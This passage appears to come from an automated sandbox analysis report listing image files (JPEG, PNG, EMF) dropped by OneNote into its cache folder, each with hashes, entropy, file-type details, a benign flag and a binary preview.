SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AA.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AC.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AE.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AF.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AH.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AJ.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AL.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AN.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AP.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AR.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AT.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AV.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B1.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B3.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B5.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B7.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B9.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
